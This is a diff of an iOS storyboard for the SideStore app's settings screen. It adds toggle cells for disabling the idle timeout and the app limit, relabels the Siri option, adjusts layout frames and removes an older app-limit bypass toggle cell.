+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="GYp-O0-pse" id="vDG-ZV-xRS">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Disable Idle Timeout" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PCh-Up-aJJ">
+                                                    <rect key="frame" x="30" y="15.5" width="166" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="iQA-wm-5ag">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleNoIdleTimeoutEnabled:" destination="aMk-Xp-UL8" eventType="valueChanged" id="WSl-Jc-g5J"/>
+                                                    </connections>
+                                                </switch>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailingMargin" secondItem="iQA-wm-5ag" secondAttribute="trailing" id="MJ1-HF-Dln"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="leading" secondItem="vDG-ZV-xRS" secondAttribute="leadingMargin" id="Ocu-jn-RAQ"/>
+                                                <constraint firstItem="iQA-wm-5ag" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="c6W-bN-VAb"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="mL6-LB-cjn"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="7PQ-AW-GcV" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="495" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="7PQ-AW-GcV" id="wQ8-9w-iiw">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Disable App Limit" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="W95-fD-NAd" userLabel="Disable App Limit">
+                                                    <rect key="frame" x="30" y="15.5" width="142.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="1aa-og-ZXD">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleDisableAppLimit:" destination="aMk-Xp-UL8" eventType="valueChanged" id="zYc-B2-JPg"/>
+                                                    </connections>
+                                                </switch>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailingMargin" secondItem="1aa-og-ZXD" secondAttribute="trailing" id="1Xa-t6-jAC"/>
+                                                <constraint firstItem="W95-fD-NAd" firstAttribute="leading" secondItem="wQ8-9w-iiw" secondAttribute="leadingMargin" id="J49-tg-KMa"/>
+                                                <constraint firstItem="1aa-og-ZXD" firstAttribute="centerY" secondItem="wQ8-9w-iiw" secondAttribute="centerY" id="UMz-ax-ln4"/>
+                                                <constraint firstItem="W95-fD-NAd" firstAttribute="centerY" secondItem="wQ8-9w-iiw" secondAttribute="centerY" id="bFd-lr-0xw"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="546" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="amC-sE-8O0" id="GEO-2e-E4k">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Add to Siri…" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="c6K-fI-CVr">
-                                                    <rect key="frame" x="30" y="15.499999999999998" width="100.5" height="20.5"/>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Allow Siri To Refresh Apps…" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="c6K-fI-CVr">
+                                                    <rect key="frame" x="30" y="15.5" width="228.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
@@ -269,19 +341,19 @@
                             <tableViewSection headerTitle="" id="eHy-qI-w5w">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="30h-59-88f" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="535" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="637" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="30h-59-88f" id="7qD-DW-Jls">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="How it works" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="2CC-iw-3bd">
-                                                    <rect key="frame" x="30" y="15.499999999999998" width="105" height="20.5"/>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="How it works" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="2CC-iw-3bd">
+                                                    <rect key="frame" x="30" y="15.5" width="105" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="WtV-Dt-sDn">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="WtV-Dt-sDn">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -309,28 +381,28 @@
                             <tableViewSection headerTitle="" id="J90-vn-u2O">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="i4T-2q-jF3" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="626" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="i4T-2q-jF3" id="VTQ-H4-aCM">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
                                                     <rect key="frame" x="30" y="15.5" width="86" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
+                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
                                                     <rect key="frame" x="187.5" y="15.5" width="157.5" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
                                                             <rect key="frame" x="0.0" y="0.0" width="125.5" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
                                                             <rect key="frame" x="139.5" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -353,28 +425,28 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="oHX-oR-nwJ" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="677" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="774.5" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="oHX-oR-nwJ" id="hN4-i5-igu">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="UI Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="oqY-wY-1Vf">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="UI Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="oqY-wY-1Vf">
                                                     <rect key="frame" x="30" y="15.5" width="89" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="gUq-6Q-t5X">
+                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="gUq-6Q-t5X">
                                                     <rect key="frame" x="198" y="15.5" width="147" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fabian (thdev)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ylE-VL-7Fq">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Fabian (thdev)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ylE-VL-7Fq">
                                                             <rect key="frame" x="0.0" y="0.0" width="115" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="e3L-vR-Jae">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="e3L-vR-Jae">
                                                             <rect key="frame" x="129" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -397,28 +469,28 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="0MT-ht-Sit" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="830" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="0MT-ht-Sit" id="OZp-WM-5H7">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Asset Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fGU-Fp-XgM">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Asset Designer" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fGU-Fp-XgM">
                                                     <rect key="frame" x="30" y="15.5" width="115.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="R8B-DW-7mY">
+                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="R8B-DW-7mY">
                                                     <rect key="frame" x="206" y="15.5" width="139" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Chris (LitRitt)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hId-3P-41T">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Chris (LitRitt)" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hId-3P-41T">
                                                             <rect key="frame" x="0.0" y="0.0" width="107" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="baq-cE-fMY">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="baq-cE-fMY">
                                                             <rect key="frame" x="121" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -441,19 +513,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="O5R-Al-lGj" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="779" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="881" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="O5R-Al-lGj" id="CrG-Mr-xQq">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Licenses" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="D6b-cd-pVK">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Licenses" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="D6b-cd-pVK">
                                                     <rect key="frame" x="30" y="15.5" width="67.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="s79-GQ-khr">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="s79-GQ-khr">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -478,62 +550,22 @@
                                     </tableViewCell>
                                 </cells>
                             </tableViewSection>
-                            <tableViewSection headerTitle="" id="2em-H5-kgS">
-                                <cells>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="n3X-OX-idC" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="870" width="375" height="51"/>
-                                        <autoresizingMask key="autoresizingMask"/>
-                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="n3X-OX-idC" id="IVp-7k-KdM">
-                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
-                                            <autoresizingMask key="autoresizingMask"/>
-                                            <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable 3-app-limit bypass" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="IY0-94-5LN">
-                                                    <rect key="frame" x="30" y="15.5" width="214" height="20.5"/>
-                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
-                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
-                                                    <nil key="highlightedColor"/>
-                                                </label>
-                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="Oie-te-KSQ">
-                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
-                                                    <connections>
-                                                        <action selector="toggleenableCowExploit:" destination="aMk-Xp-UL8" eventType="valueChanged" id="tfb-kk-C17"/>
-                                                    </connections>
-                                                </switch>
-                                            </subviews>
-                                            <constraints>
-                                                <constraint firstItem="IY0-94-5LN" firstAttribute="leading" secondItem="IVp-7k-KdM" secondAttribute="leadingMargin" id="07y-eS-INC"/>
-                                                <constraint firstItem="Oie-te-KSQ" firstAttribute="centerY" secondItem="IVp-7k-KdM" secondAttribute="centerY" id="1dS-uM-gb1"/>
-                                                <constraint firstItem="IY0-94-5LN" firstAttribute="centerY" secondItem="IVp-7k-KdM" secondAttribute="centerY" id="FyZ-BM-Ss0"/>
-                                                <constraint firstAttribute="trailingMargin" secondItem="Oie-te-KSQ" secondAttribute="trailing" id="I1v-Ub-eJJ"/>
-                                            </constraints>
-                                        </tableViewCellContentView>
-                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
-                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
-                                        <userDefinedRuntimeAttributes>
-                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
-                                                <integer key="value" value="0"/>
-                                            </userDefinedRuntimeAttribute>
-                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="NO"/>
-                                        </userDefinedRuntimeAttributes>
-                                    </tableViewCell>
-                                </cells>
-                            </tableViewSection>
                             <tableViewSection headerTitle="" id="OMa-EK-hRI">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="FMZ-as-Ljo" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="961" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="972" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="FMZ-as-Ljo" id="JzL-Of-A3T">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Send Feedback" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="pMI-Aj-nQF">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Send Feedback" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="pMI-Aj-nQF">
                                                     <rect key="frame" x="30" y="15.5" width="125.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
